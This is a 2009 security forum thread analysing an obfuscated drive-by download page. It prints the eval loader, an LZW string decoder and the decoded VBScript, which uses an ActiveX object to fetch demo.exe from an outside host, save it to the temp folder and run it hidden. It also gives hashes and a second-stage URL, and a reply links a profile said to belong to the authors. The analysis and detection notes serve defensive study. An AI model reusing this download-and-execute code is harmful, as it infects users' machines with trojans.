Author Topic: viking.com.br - HTML Guardian  (Read 6408 times)


January 29, 2009, 11:48:15 am

SysAdMini

Code: [Select]
viking.com.br/demo.html
Quote
The source code of this page is encrypted with HTML Guardian,  the world's standart for website protection

eval 1
Code: [Select]
// Stage 1 ("eval 1"): a one-line loader. The argument is a percent-escaped
// string; unescape() turns it back into JavaScript source and eval() runs it
// in this function's scope.
// Analysis note: to recover the next stage without executing it, print the
// result of unescape(_O0) instead of handing it to eval.
function ____(_O0){
  eval(unescape(_O0))
}

eval 2
Code: [Select]
// Stage 2 ("eval 2"): string decoder followed by a document.write of the result.
// NOTE(review): this listing is beautifier output and does not parse as printed
// ("/ za / g", "case0 :", "_1 ++< l8"); treat it as a record of the sample.
// OO0O (array of encoded strings) and naa (write switch) are defined outside
// this listing.

// 1 when the page runs in Opera, otherwise 0; only selects how output is collected.
var l2 = window.opera ? 1 : 0;
// l3(l4): decodes one encoded string and returns the decoded text.
function l3(l4){
  // Every match of the pattern is replaced by a NUL character (char code 0).
  // The spaces inside the regex literal are presumably a beautifier artifact.
  // l5 and l6 are assigned without var, so they become globals.
  l5 =/ za / g;
  l6 = String.fromCharCode(0);
  l4 = l4.replace(l5, l6);
  // l7 = decoded code list, l8 = input length, _1 = read index (set to the
  // length first, then reset to 0 later in the same statement), I = write index.
  var l7 = new Array(), l8 = _1 = l4.length, l9, lI, il = 16256, _1 = 0, I = 0, li = '';
  // Unpack the input two characters at a time into one numeric code each.
  // 16256 is 127 << 7, so a pair (l9, lI) yields lI + 128 * (127 - l9).
  // The post-increment test lets the loop read past the end of the string once
  // (charCodeAt gives NaN there), leaving a trailing NaN entry in l7.
  do {
    l9 = l4.charCodeAt(_1);
    lI = l4.charCodeAt( ++ _1);
    l7[I ++ ] = lI + il - (l9 << 7)
  }
  while (_1 ++< l8);
  // l1 = output pieces, l0 = dictionary. The loop seeds l0[128] down to l0[1]
  // with the single character of that code; index 0 is not filled because the
  // loop ends when --Il reaches 0.
  var l1 = new Array(), l0 = new Array(), Il = 128;
  do {
    l0[Il] = String.fromCharCode(Il)
  }
  while ( -- Il);
  // Il now counts the next dictionary slot to write (the seeded l0[128] is
  // overwritten by the first new entry).
  Il = 128;
  // The first code is emitted directly; ll remembers the previous code and _l
  // is the read position (both implicit globals).
  l1[0] = li = l0[l7[0]];
  ll = l7[0];
  _l = 1;
  // Stop one short of the end, which skips the trailing NaN entry noted above.
  var l_ = l7.length - 1;
  // LZW-style dictionary decode: each step emits one string and adds one entry.
  while (_l < l_){
    switch(l7[_l] < Il ? 1 : 0){
      // Selector 0: the code is not in the dictionary yet, so the new entry is
      // the previous string plus its own first character, and that is emitted.
      case0 : l0[Il] = l0[ll] + String(l0[ll]).substr(0, 1);
      l1[_l] = l0[Il];
      if (l2){
        li += l0[Il]
      }
      ;
      break ;
      // Selector 1: known code. Emit its string, then add the previous string
      // plus the first character of the current one as the new entry.
      default : l1[_l] = l0[l7[_l]];
      if (l2){
        li += l0[l7[_l]]
      }
      ;
      l0[Il] = l0[ll] + String(l0[l7[_l]]).substr(0, 1);
      break
    }
    ;
    Il++;
    ll = l7[_l];
    _l ++
  }
  ;
  // Same pieces either way: joined array when l2 is 0, concatenated string
  // when l2 is 1.
  if (!l2){
    return (l1.join(''))
  }
  else {
    return li
  }
}
;
// Decode every element of OO0O and concatenate the results.
var lO = '';
for (ii = 0; ii < OO0O.length; ii ++ ){
  lO += l3(OO0O[ii])
}
;
// The decoded markup is injected into the page only when naa is truthy.
// Analysis note: printing lO instead of calling document.write shows the
// payload without rendering it.
if (naa){
  document.write(lO)
}
;

writes
Code: [Select]
<!--
  Analyst note: this is the markup the stage 2 decoder passes to document.write.
  The listing has lost its spaces and line breaks ("onerrorresumenextSetobj1"),
  so it is a record of the sample rather than runnable script.
  What the visible text shows: an object element with classid
  BD96C556-65A3-11D0-983A-00C04FC29E36 (the RDS.DataSpace ActiveX control) is
  used to create Microsoft.XMLHTTP, Adodb.Stream, Scripting.FileSystemObject and
  Shell.Application. The ProgID strings are assembled with "&", presumably to
  avoid simple string signatures.
  XMLHTTP requests demo.exe, the stream (type 1, binary) saves the response body
  as tropsp.exe under GetSpecialFolder(2), which is the temporary folder, and
  ShellExecute opens the file with window style 0 (hidden).
  Detection ideas: flag pages that pair this classid with CreateObject calls, and
  alert when a browser process writes an .exe to the temp directory and then
  launches it.
-->
<script language="VBScript">onerrorresumenextSetobj1 = document.createElement("object")obj1.setAttribute"classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"est1 = "Microsoft." & "XMLHTTP"Setobj2 = obj1.
CreateObject(est1, "")est = "Ado" & "db." & "Str" & "eam"setobj3 = obj1.createobject(est,
"")obj3.type = 1est2 = "GET"obj2.Openest2, "http://www.viping.com.br/demo.exe", Falseobj2.
SendsetF = obj1.createobject("Scripting.FileSystemObject", "")setpasta = F.
GetSpecialFolder(2)fi = "tropsp.exe"fi = F.BuildPath(pasta, fi)obj3.openobj3.writeobj2.
responseBodyobj3.savetofilefi, 2obj3.closesetobj5 = obj1.createobject("Shell.Application",
"")obj5.ShellExecutefi, "", "", "open", 0</script>

downloads demo.exe

http://www.virustotal.com/analisis/966e9d72f6bed639f8c59616c0d4ad25 10/38
MD5...: 76b2a9b0f3c845f73631c9a0733fec90

demo.exe requests
Code: [Select]
http://74.86.166.161/~contar0/manual.pdf
which is unavailable

January 29, 2009, 02:57:09 pm
Reply #1

Serg

This is the Brazilian "SexyMoney" from "bl4ck". Each trojan carries a banner: "Give it all =D", "Cabo a porra toda!", etc. Here is a photo and profile of the authors: http://profile.myspace.com /index.cfm?fuseaction=user.viewProfile&friendID=83693066

BTW manual.pdf is some banker trojan...
PS. Идиоты...